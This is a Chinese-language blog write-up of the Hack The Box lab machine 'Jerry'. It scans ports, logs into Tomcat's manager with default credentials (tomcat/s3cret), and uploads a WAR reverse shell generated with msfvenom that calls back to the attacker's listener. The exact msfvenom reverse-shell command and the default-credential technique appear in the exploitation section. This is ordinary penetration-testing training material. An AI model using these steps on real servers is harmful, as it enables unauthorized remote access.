freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

HTB:Jerry渗透测试
HBXQ 2021-05-08 23:43:24 217852

基础信息

简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透
链接:https://www.hackthebox.eu/home/machines/profile/144
描述:
图片.png

前言

本次演练使用kali系统按照渗透测试的过程进行操作,通过nmap发现端口开放了tomcat8080端口,使用密码登录tomcat,使用msfvenom 生成war文件上传到tomcat中,通过反弹获取shell。

一、信息收集

1、靶机ip

IP地址为:10.10.10.95
图片.png

2、靶机端口与服务
nmap -sV -sS -T4 -O -A 10.10.10.95

图片.png

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
3、网站信息收集

查看8080端口
图片.png
通过dirsearch进行目录扫描获取网站目录
图片.png
这里我列出了部分需要的目录

/host-manager/html
/manager/html
/manager/

二、漏洞探测与利用

1、生成木马文件

进入/host-manager/html目录发现需要账号密码
图片.png
点击取消后,再返回界面发现账号与密码
图片.png
username="tomcat"
password="s3cret"
使用该密码进行登录,返回403页面无法正常进行登录
图片.png
最后在/manager/目录下成功登录
图片.png
发现可以上传war格式文件
使用msfvenom生成shell文件

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f war > shell.war

图片.png

2、使用msf获取shell

首先设置好msf,使用msf监听4444端口获取反弹的shell
图片.png
在登陆页面上传war文件
图片.png
上传成功后点击shell
图片.png
成功获取到shell

图片.png

三、提权

使用这种方式所获取的直接是authority权限可直接查看root.txt
图片.png
进入 \Users\Administrator\Desktop目录发现没有root.txt但是存在flags
图片.png
进入flags目录使用type命令查看2 for the price of 1.txt文件
获取到root.txt与user.txt
图片.png

# 渗透测试 # web安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 HBXQ 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
渗透
HBXQ LV.5
搬砖小牛马
  • 43 文章数
  • 48 关注者
安卓基础:安卓安装包APK的组成以及生成步骤
2021-10-18
HTB:Dropzone渗透测试
2021-08-26
HTB:Active渗透测试
2021-08-24